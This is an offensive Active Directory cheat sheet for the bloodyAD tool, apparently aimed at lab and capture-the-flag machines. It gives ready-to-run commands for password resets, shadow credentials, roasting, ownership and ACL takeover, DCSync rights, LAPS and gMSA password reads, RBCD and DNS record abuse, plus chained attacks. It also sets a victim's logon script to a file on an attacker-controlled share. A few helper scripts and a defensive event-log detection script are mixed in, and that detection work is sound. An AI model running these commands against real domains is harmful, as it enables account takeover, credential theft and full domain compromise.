bloodyAD is most useful when organized by abuse primitive, not just raw commands.
For each technique:
- Requirements = what rights/conditions you need
- How to discover it = exact commands to check
- When to use = when this path makes sense
- Command = exact bloodyAD abuse command
- Follow-up = what to do next
- Verify = how to confirm it worked
Choosing the Correct TARGET Value
The value for TARGET depends on the object type.
Use the name for:
- users → a.white
- computers → WEB01$
- groups → Domain Admins
Use the Distinguished Name (DN) for:
- domain object → DC=lab,DC=htb
- OUs → OU=Servers,DC=lab,DC=htb
- special LDAP objects → CN=NTDS Quotas,DC=lab,DC=htb
Fast rule
- User / Computer / Group → usually use the name
- OU / Domain / Special LDAP object → usually use the full DN
If unsure, search first and copy the distinguishedName from the result:
# User
bloodyAD --host 10.10.10.10 -d lab.htb -u 'user' -p 'password' get search --filter '(sAMAccountName=a.white)'
# Computer
bloodyAD --host 10.10.10.10 -d lab.htb -u 'user' -p 'password' get search --filter '(sAMAccountName=WEB01$)'
# Group
bloodyAD --host 10.10.10.10 -d lab.htb -u 'user' -p 'password' get search --filter '(cn=Domain Admins)'
# OU
bloodyAD --host 10.10.10.10 -d lab.htb -u 'user' -p 'password' get search --filter '(ou=Servers)'
# Special object
bloodyAD --host 10.10.10.10 -d lab.htb -u 'user' -p 'password' get search --filter '(cn=NTDS Quotas)'
Use the returned distinguishedName if the simple name does not work.
Domain DN quick reference
Convert the domain name to a DN:
lab.htb → DC=lab,DC=htb
pirate.htb → DC=pirate,DC=htb
Examples
# User
bloodyAD --host 10.10.10.10 -d lab.htb -u 'user' -p 'password' set password 'a.white' 'Password01!'
# Group
bloodyAD --host 10.10.10.10 -d lab.htb -u 'user' -p 'password' add groupMember 'Domain Admins' 'a.white'
# Domain object
bloodyAD --host 10.10.10.10 -d lab.htb -u 'user' -p 'password' get object 'DC=lab,DC=htb' --attr ms-DS-MachineAccountQuota
# OU
bloodyAD --host 10.10.10.10 -d lab.htb -u 'user' -p 'password' set owner 'OU=Servers,DC=lab,DC=htb' 'a.white'
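As an added helper (not bloodyAD's own code), the following Python encodes the TARGET and --filter rules above: RFC 4515 escaping for the filter value, the domain-to-DN conversion, and the name-or-DN choice based on an entry's objectClass. The Entry class is an assumed, simplified view of a returned LDAP entry, not bloodyAD's output format.

```python
from dataclasses import dataclass
from typing import List, Optional

# RFC 4515 escaping for values placed inside an LDAP search filter, so a
# name containing '(' ')' '*' or '\' is matched literally instead of
# changing the filter's meaning.
_ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\x00": r"\00"}


def ldap_escape(value: str) -> str:
    """Escape a filter value per RFC 4515."""
    return "".join(_ESCAPES.get(ch, ch) for ch in value)


def domain_to_dn(domain: str) -> str:
    """lab.htb -> DC=lab,DC=htb (the 'Domain DN quick reference' rule)."""
    parts = [p for p in domain.strip().lower().split(".") if p]
    if not parts:
        raise ValueError("empty domain name")
    return ",".join(f"DC={p}" for p in parts)


def search_filter(kind: str, name: str) -> str:
    """Return the `get search --filter` value for one of the object kinds above."""
    attr = {"user": "sAMAccountName", "computer": "sAMAccountName",
            "group": "cn", "ou": "ou", "special": "cn"}[kind]
    if kind == "computer" and not name.endswith("$"):
        name += "$"  # computer sAMAccountNames always carry the trailing '$'
    return f"({attr}={ldap_escape(name)})"


@dataclass
class Entry:
    """Assumed minimal view of a returned LDAP entry (constructed for this example)."""
    object_class: List[str]
    sam_account_name: Optional[str]
    distinguished_name: str


def target_value(entry: Entry) -> str:
    """Apply the 'Fast rule': name for user/computer/group, full DN for anything else."""
    classes = {c.lower() for c in entry.object_class}
    if classes & {"user", "computer", "group"} and entry.sam_account_name:
        return entry.sam_account_name
    return entry.distinguished_name
```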
Common Discovery Commands
Use these first to understand what you can control.
Find writable objects / attributes
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' get writable --detail
Retrieve full information about an object
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' get object 'TARGET'
Retrieve specific attributes from an object
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' get object 'TARGET' --attr servicePrincipalName userAccountControl member memberOf userPrincipalName mail scriptPath altSecurityIdentities msDS-ManagedPassword
Search for a specific object
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' get search --filter '(sAMAccountName=TARGET)'
Search for users with SPNs
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' get search --filter '(servicePrincipalName=*)'
Search for LAPS passwords
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime
Search for gMSA objects
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' get search --filter '(msDS-ManagedPassword=*)'
User / Computer Object Abuse
Change Password
Reset the target user’s password and authenticate as them.
Requirements
- GenericAll, GenericWrite, or ForceChangePassword over the target user
How to discover it
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' get writable --detail
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' get object 'USER_TARGET'
When to use
- you want immediate access
- the target is a normal user account
- password reset noise is acceptable
- changing the password will not break a service
Command
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' set password 'USER_TARGET' 'Password01!'
Alternatives
rpcclient -U 'user%password' 10.10.10.10 -W DOMINIO -c 'setuserinfo2 USER_TARGET 23 Password01!'
net rpc password "USER_TARGET" "Password01!" -U 'dominio.htb/user%password' -S 10.10.10.10
powerview dominio.htb/'user':'password'@10.10.10.10 --dc-ip 10.10.10.10
PV > Set-DomainUserPassword -Identity 'USER_TARGET' -AccountPassword 'Password01!'
Follow-up
nxc smb 10.10.10.10 -u 'USER_TARGET' -p 'Password01!'
evil-winrm -i 10.10.10.10 -u 'USER_TARGET' -p 'Password01!'
Verify
nxc smb 10.10.10.10 -u 'USER_TARGET' -p 'Password01!'
Notes
- noisy
- avoid on service accounts unless you know impact is acceptable
Shadow Credentials
Add a malicious key credential to the target and authenticate as them.
Requirements
- GenericAll or GenericWrite over a user/computer
- PKINIT-compatible path available
How to discover it
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' get writable --detail
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' get object 'TARGET'
When to use
- password reset is too noisy
- you want account access without changing the password
- the target may be a service account
- you want a cleaner takeover path
Command
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' add shadowCredentials 'TARGET'
Alternatives
certipy shadow auto -username john.w -p 'Pack_Beneath_Solid9!' -account angela.w -target dc-01.darkcorp.htb
Follow-up
- get TGT
- recover NT hash
- pass-the-hash
- authenticate as target over SMB / WinRM / LDAP
Verify
- verify output from the shadow credential tooling
- test access as the compromised principal
Notes
- often cleaner than password reset
- great for service accounts and stealthier takeovers
Enable AS-REP Roasting
Set DONT_REQ_PREAUTH on a target user to make them AS-REP roastable.
Requirements
- GenericAll or GenericWrite over the target user
How to discover it
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' get writable --detail
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' get object 'TARGET' --attr userAccountControl
When to use
- you want offline cracking instead of changing the password
- you suspect weak passwords
- you want a roastable artifact
Command
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' add uac 'TARGET' -f DONT_REQ_PREAUTH
Follow-up
Request AS-REP material and crack offline.
Verify
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' get object 'TARGET' --attr userAccountControl
Notes
- more situational than password reset
- good in weak-password environments
Enable a Disabled Account
Remove the ACCOUNTDISABLE flag from a disabled user.
Requirements
- control over the target user object
How to discover it
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' get object 'TARGET' --attr userAccountControl
When to use
- the target is disabled but useful
- you plan to reset password or authenticate as them afterward
Command
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' remove uac 'TARGET' -f ACCOUNTDISABLE
Follow-up
- reset the password
- add shadow credentials
- authenticate as the target
Verify
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' get object 'TARGET' --attr userAccountControl
Add TRUSTED_TO_AUTH_FOR_DELEGATION
Set the UAC flag that enables protocol transition for constrained delegation.
Requirements
- control over the target account
- a delegation chain where this matters
How to discover it
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' get object 'TARGET' --attr userAccountControl servicePrincipalName
When to use
- you already know you are building a delegation chain
- not a first-choice primitive unless the path is clear
Command
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' add uac 'TARGET' -f TRUSTED_TO_AUTH_FOR_DELEGATION
Verify
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' get object 'TARGET' --attr userAccountControl
Notes
- advanced / chain-dependent
- most useful in delegation abuse paths
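The three UAC sections above all verify by re-reading userAccountControl. This added Python helper (not part of bloodyAD) decodes the raw integer the attribute holds, diffs a before/after pair so you can confirm that only the intended flag changed, and lists the flags worth reviewing. It assumes you have the numeric attribute value; bloodyAD's own printed form is not parsed here.

```python
# Documented userAccountControl bit values (the subset needed for the checks above).
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0020: "PASSWD_NOTREQD",
    0x0200: "NORMAL_ACCOUNT",
    0x1000: "WORKSTATION_TRUST_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x80000: "TRUSTED_FOR_DELEGATION",
    0x100000: "NOT_DELEGATED",
    0x400000: "DONT_REQ_PREAUTH",
    0x1000000: "TRUSTED_TO_AUTH_FOR_DELEGATION",
}
KNOWN_MASK = sum(UAC_FLAGS)

# Flags a reviewer should look at, with the reason each one matters.
REVIEW = {
    "DONT_REQ_PREAUTH": "Kerberos pre-authentication not required (AS-REP roastable)",
    "PASSWD_NOTREQD": "empty password permitted",
    "TRUSTED_FOR_DELEGATION": "unconstrained delegation",
    "TRUSTED_TO_AUTH_FOR_DELEGATION": "protocol transition (S4U2Self) allowed",
}


def decode_uac(value):
    """Return the flag names set in a userAccountControl value (int or decimal string)."""
    v = int(value)
    return [name for bit, name in sorted(UAC_FLAGS.items()) if v & bit]


def flag_set(value, flag):
    """True if the named flag is set in the value."""
    bit = next(b for b, n in UAC_FLAGS.items() if n == flag)
    return bool(int(value) & bit)


def diff_uac(before, after):
    """(added, removed, unknown_bits) between two reads of the attribute.
    A non-zero unknown_bits means a bit outside UAC_FLAGS changed and needs a closer look."""
    b, a = int(before), int(after)
    changed = b ^ a
    added = [n for bit, n in sorted(UAC_FLAGS.items()) if changed & bit and a & bit]
    removed = [n for bit, n in sorted(UAC_FLAGS.items()) if changed & bit and b & bit]
    return added, removed, changed & ~KNOWN_MASK


def verify_toggle(before, after, flag, expect_set):
    """Verify step: exactly this one flag changed, in the expected direction."""
    added, removed, unknown = diff_uac(before, after)
    wanted = ([flag], []) if expect_set else ([], [flag])
    return (added, removed) == wanted and unknown == 0


def review(value):
    """Flags in the value that warrant review, with reasons."""
    return {f: REVIEW[f] for f in decode_uac(value) if f in REVIEW}
```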
Targeted Kerberoast / Write SPN
Assign an SPN to a user and request a TGS for offline cracking.
Requirements
- GenericAll or GenericWrite over the target user
How to discover it
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' get writable --detail
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' get object 'target' --attr servicePrincipalName
When to use
- password reset is too noisy
- target may have a weak password
- you want offline cracking
Command
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' set object 'target' servicePrincipalName -v 'cifs/gzzcoo'
Alternative example
bloodyAD --host $dc -d $domain -u $username -p $password set object $target servicePrincipalName -v 'domain/meow'
Follow-up
Request TGS and crack it offline.
Verify
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' get object 'target' --attr servicePrincipalName
Notes
- not instant access
- best when target password is likely crackable
Modify UPN
Change a user’s userPrincipalName.
Requirements
- control over the target user object
How to discover it
bloodyAD --host $dc -d $domain -u $username -p $password get object $old_upn --attr userPrincipalName
When to use
- UPN spoofing chain
- AD CS / certificate-related abuse
- identity confusion attack path
Command
bloodyAD --host $dc -d $domain -u $username -p $password set object $old_upn userPrincipalName -v $new_upn
Verify
bloodyAD --host $dc -d $domain -u $username -p $password get object $old_upn --attr userPrincipalName
Modify Mail
Modify the mail attribute on a user.
Requirements
- control over the target user object
How to discover it
bloodyAD --host $dc -d $domain -u $username -p $password get object $target_user --attr mail
When to use
- certificate abuse chain
- ESC14-style identity mapping
- attribute-based impersonation path
Command
bloodyAD --host $dc -d $domain -u $username -p $password set object $target_user mail -v newmail@test.local
Verify
bloodyAD --host $dc -d $domain -u $username -p $password get object $target_user --attr mail
Modify altSecurityIdentities
Set altSecurityIdentities for X.509 / ESC-style abuse.
Requirements
- control over the target user object
- certificate abuse chain in play
How to discover it
bloodyAD --host $dc -d $domain -u $username -p $password get object $target_user --attr altSecurityIdentities
When to use
- AD CS / ESC14 / X.509 mapping abuse
- you know the exact certificate mapping path
Command
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' set object 'user_target' altSecurityIdentities -v 'X509:<I><.........>'
Alternative example
bloodyAD --host $dc -d $domain -u $username -p $password set object $target_user altSecurityIdentities -v 'X509:<RFC822>user@test.local'
Verify
bloodyAD --host $dc -d $domain -u $username -p $password get object $target_user --attr altSecurityIdentities
Set Logon Script Path
Assign a malicious logon script path to a target user.
Requirements
- control over the target user object
- target likely to log on interactively
- reachable SMB share / payload path
How to discover it
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' get object 'TARGET' --attr scriptPath
When to use
- you want delayed execution
- target is likely to log on
- you want code execution or auth capture via logon behavior
Command
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' set object 'TARGET' scriptpath -v '\\<ATTACKER_IP>\malicious.bat'
Verify
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' get object 'TARGET' --attr scriptPath
Notes
- delayed, situational
- depends on victim logon behavior
Group Abuse
Add User to Group
Add a controlled user into a target group.
Requirements
- rights to modify group membership
How to discover it
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' get writable --detail
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' get object 'GROUP_TARGET' --attr member
When to use
- the group grants meaningful access
- you want a direct privilege jump
Command
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' add groupMember 'GROUP_TARGET' 'USER_TARGET'
Verify
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' get object 'GROUP_TARGET' --attr member
Notes
- re-authenticate to pick up new membership
ACL / Ownership Abuse
Set Owner
Take ownership of an object.
Requirements
- WriteOwner over the target object
How to discover it
bloodyAD --host $dc -d $domain -u $username -p $password get writable --detail
bloodyAD --host $dc -d $domain -u $username -p $password get object $target_group
When to use
- you have WriteOwner but not direct abuse rights yet
- you want to convert ownership into ACL control
Command
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' set owner 'OBJECT_TARGET' 'USER_TARGET'
Follow-up
Grant GenericAll and then abuse the object.
Verify
- inspect object ownership with your preferred ACL tooling
Grant GenericAll
Grant a user full control over an object.
Requirements
- sufficient rights to modify the target object DACL
How to discover it
bloodyAD --host $dc -d $domain -u $username -p $password get writable --detail
When to use
- after WriteOwner
- when you need full control before password reset / shadow creds / group abuse
Command
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'usuario' -p 'password' add genericAll 'OBJECT_TARGET' 'USER_TARGET'
Alternative example
bloodyAD --host $dc -d $domain -u $username -p $password add genericAll $DN $target_username
Follow-up
- password reset
- shadow credentials
- SPN write
- group membership abuse
Add DCSync Rights
Grant replication rights used for DCSync.
Requirements
- control over the domain object ACL
How to discover it
- identify write access to the domain naming context / domain object
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' get writable --detail
When to use
- endgame / domain compromise
- you want direct credential replication
Command
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' add dcsync 'OBJECT_TARGET'
Follow-up
Run DCSync with appropriate tooling.
Notes
- very high impact
- usually a finishing move
Password / Credential Reading
Read LAPS Password
Read legacy LAPS-managed local admin passwords.
Requirements
- read access to the LAPS attributes
How to discover it
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime
When to use
- you want local admin on servers/workstations
- lateral movement through host compromise is the best path
Command
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime
Follow-up
- SMB / WinRM / PsExec / WMIExec
- dump credentials
- hunt for sessions
Read GMSA Password
Read msDS-ManagedPassword from a gMSA account.
Requirements
- read access to the target gMSA object
How to discover it
bloodyAD --host $dc -d $domain -u $username -p $password get object $target_username --attr msDS-ManagedPassword
Command
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' get object 'TARGET' --attr msDS-ManagedPassword
Alternative example
bloodyAD --host $dc -d $domain -u $username -p $password get object $target_username --attr msDS-ManagedPassword
Follow-up
- parse the blob
- authenticate as the gMSA
- enumerate where the gMSA is useful
Enumeration / Search / Recovery
Retrieve User / Object Information
Command
bloodyAD --host $dc -d $domain -u $username -p $password get object $target_username
Find Writable Attributes / Objects
Command
bloodyAD --host $dc -d $domain -u $username -p $password get writable --detail
Find Deleted Objects
Command
bloodyAD --host $dc -d $domain -u $username -p $password get writable --include-del
Notes
- this only adds deleted objects to the writable listing; pair it with the tombstoned-object search below
Extended Search Operations
Help
bloodyAD --host $dc -d $domain -u $username -p $password get search -h
Search tombstoned / deleted objects
bloodyAD --host $dc -d $domain -u $username -p $password -k get search -c 1.2.840.113556.1.4.2064 -c 1.2.840.113556.1.4.2065
Restore a Deleted Object
Command
bloodyAD --host $dc -d $domain -u $username -p $password -k set restore $user_to_restore
Machine / Delegation Abuse
Enumerate MachineAccountQuota
Command
bloodyAD --host $dc -d $domain -u $username -p $password get object 'DC=dc,DC=dc' --attr ms-DS-MachineAccountQuota
Modify MachineAccountQuota
Command
bloodyAD --host $dc -d $domain -u $username -p $password set object 'DC=dc,DC=dc' ms-DS-MachineAccountQuota -v 10
Notes
- replace DC=dc,DC=dc with the actual domain DN, for example:
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' get object 'DC=dominio,DC=htb' --attr ms-DS-MachineAccountQuota
Create a New Computer Account
Requirements
- MachineAccountQuota > 0 or delegated rights to create computer objects
How to discover it
bloodyAD --host $dc -d $domain -u $username -p $password get object 'DC=dc,DC=dc' --attr ms-DS-MachineAccountQuota
Command
bloodyAD --host $dc -d $domain -u $username -p $password add computer $computer_name $computer_password
Follow-up
- use the machine account in RBCD / delegation chains
Add Resource-Based Constrained Delegation (RBCD)
Requirements
- write access over the target computer object
- a controlled computer account to delegate from
How to discover it
bloodyAD --host $dc -d $domain -u $username -p $password get object 'DELEGATE_TO$'
Command
bloodyAD --host $dc -d $domain -u $username -p $password add rbcd 'DELEGATE_TO$' 'DELEGATE_FROM$'
Follow-up
- S4U / service ticket abuse
- impersonation to services on the target computer
DNS Abuse
Add / Register DNS Record
Requirements
- rights to create DNS records
How to discover it
- determine if DNS write abuse is in the path
- inspect permissions / try record creation in lab contexts
Command
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' add dnsRecord <dns_record_target> <ATTACKER_IP>
Alternative example
bloodyAD --host $dc -d $domain -u $username -p $password add dnsRecord $record_name $attacker_ip
Follow-up
- relay
- spoofing
- coercion
- name resolution abuse
Common Chains
WriteOwner → GenericAll → Password Reset
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' set owner 'OBJECT_TARGET' 'USER_TARGET'
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' add genericAll 'OBJECT_TARGET' 'USER_TARGET'
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' set password 'OBJECT_TARGET' 'Password01!'
WriteOwner → GenericAll → Shadow Credentials
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' set owner 'OBJECT_TARGET' 'USER_TARGET'
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' add genericAll 'OBJECT_TARGET' 'USER_TARGET'
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' add shadowCredentials 'OBJECT_TARGET'
GenericWrite → SPN Write → Kerberoast
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' set object 'target' servicePrincipalName -v 'cifs/gzzcoo'
Then request the service ticket and crack it offline.
Read LAPS → Local Admin
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime
Then authenticate to the target host using the recovered local admin password.
Add Computer → RBCD
bloodyAD --host $dc -d $domain -u $username -p $password add computer $computer_name $computer_password
bloodyAD --host $dc -d $domain -u $username -p $password add rbcd 'DELEGATE_TO$' 'DELEGATE_FROM$'
Then abuse S4U to impersonate users to services on the target computer.
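From the defender's side, every chain above leaves attribute writes on the target object. The following added Python (not from the page's tooling) runs two rules over a constructed, simplified list of Security events 5136 (directory service object modified) and 4724 (password reset attempt): an alert on any write to the attributes these primitives touch, and a correlation for the WriteOwner → GenericAll → password reset chain. The event field names, sample data and writer allowlist are assumptions.

```python
from datetime import datetime, timedelta

# Attribute written -> the primitive from the sections above that writes it.
SENSITIVE_ATTRS = {
    "ntsecuritydescriptor": "owner/ACL change (set owner, add genericAll, add dcsync)",
    "msds-keycredentiallink": "shadow credentials",
    "serviceprincipalname": "SPN write / targeted Kerberoast",
    "useraccountcontrol": "UAC flag change (DONT_REQ_PREAUTH, ACCOUNTDISABLE, ...)",
    "scriptpath": "logon script path",
    "userprincipalname": "UPN change",
    "mail": "mail change",
    "altsecurityidentities": "explicit certificate mapping",
    "member": "group membership change",
    "msds-allowedtoactonbehalfofotheridentity": "RBCD",
    "ms-ds-machineaccountquota": "MachineAccountQuota change",
}
CHAIN_WINDOW = timedelta(minutes=30)  # assumed correlation window

# Constructed sample events (simplified 5136 / 4724 fields, not a real log export).
SVC = "CN=svc_backup,CN=Users,DC=lab,DC=htb"
JDOE = "CN=j.doe,CN=Users,DC=lab,DC=htb"
EVENTS = [
    {"time": "2024-05-01T10:00:00", "id": 5136, "subject": "LAB\\a.white", "object": SVC, "attr": "nTSecurityDescriptor"},
    {"time": "2024-05-01T10:01:00", "id": 5136, "subject": "LAB\\a.white", "object": SVC, "attr": "nTSecurityDescriptor"},
    {"time": "2024-05-01T10:02:30", "id": 4724, "subject": "LAB\\a.white", "object": SVC, "attr": None},
    {"time": "2024-05-01T11:00:00", "id": 5136, "subject": "LAB\\helpdesk1", "object": JDOE, "attr": "mail"},
    {"time": "2024-05-01T11:05:00", "id": 5136, "subject": "LAB\\svc_sync", "object": JDOE, "attr": "mail"},
]
# Assumed allowlist: accounts expected to write a given attribute (e.g. a sync service).
EXPECTED_WRITERS = {"mail": {"LAB\\svc_sync"}}


def _t(ev):
    return datetime.fromisoformat(ev["time"])


def attribute_alerts(events):
    """One alert per sensitive-attribute write not made by an allow-listed writer."""
    alerts = []
    for ev in events:
        if ev["id"] != 5136 or not ev["attr"]:
            continue
        key = ev["attr"].lower()
        if key in SENSITIVE_ATTRS and ev["subject"] not in EXPECTED_WRITERS.get(key, set()):
            alerts.append((ev["subject"], ev["object"], SENSITIVE_ATTRS[key]))
    return alerts


def chain_alerts(events):
    """Flag a password reset (4724) preceded within CHAIN_WINDOW by nTSecurityDescriptor
    writes on the same object by the same subject: the set owner -> add genericAll ->
    set password chain. Returns (subject, object, number of prior ACL writes)."""
    acl_writes = [e for e in events if e["id"] == 5136
                  and (e["attr"] or "").lower() == "ntsecuritydescriptor"]
    alerts = []
    for ev in events:
        if ev["id"] != 4724:
            continue
        prior = [a for a in acl_writes if a["subject"] == ev["subject"]
                 and a["object"] == ev["object"]
                 and timedelta(0) <= _t(ev) - _t(a) <= CHAIN_WINDOW]
        if prior:
            alerts.append((ev["subject"], ev["object"], len(prior)))
    return alerts
```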
Quick Reference
Discovery
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' get writable --detail
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' get object 'TARGET'
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' get search --filter '(sAMAccountName=TARGET)'
Password / Account
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' set password 'USER_TARGET' 'Password01!'
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' add uac 'TARGET' -f DONT_REQ_PREAUTH
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' remove uac 'TARGET' -f ACCOUNTDISABLE
Group / ACL
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' add groupMember 'GROUP_TARGET' 'USER_TARGET'
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' set owner 'OBJECT_TARGET' 'USER_TARGET'
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'usuario' -p 'password' add genericAll 'OBJECT_TARGET' 'USER_TARGET'
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' add dcsync 'OBJECT_TARGET'
Credentials / Roasting / Delegation
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' add shadowCredentials 'target'
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' set object 'target' servicePrincipalName -v 'cifs/gzzcoo'
bloodyAD --host $dc -d $domain -u $username -p $password add computer $computer_name $computer_password
bloodyAD --host $dc -d $domain -u $username -p $password add rbcd 'DELEGATE_TO$' 'DELEGATE_FROM$'
Attribute / AD CS / DNS
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' set object 'TARGET' scriptpath -v '\\<ATTACKER_IP>\malicious.bat'
bloodyAD --host $dc -d $domain -u $username -p $password set object $old_upn userPrincipalName -v $new_upn
bloodyAD --host $dc -d $domain -u $username -p $password set object $target_user mail -v newmail@test.local
bloodyAD --host $dc -d $domain -u $username -p $password set object $target_user altSecurityIdentities -v 'X509:<RFC822>user@test.local'
bloodyAD --host 10.10.10.10 -d dominio.htb -u 'user' -p 'password' add dnsRecord <dns_record_target> <ATTACKER_IP>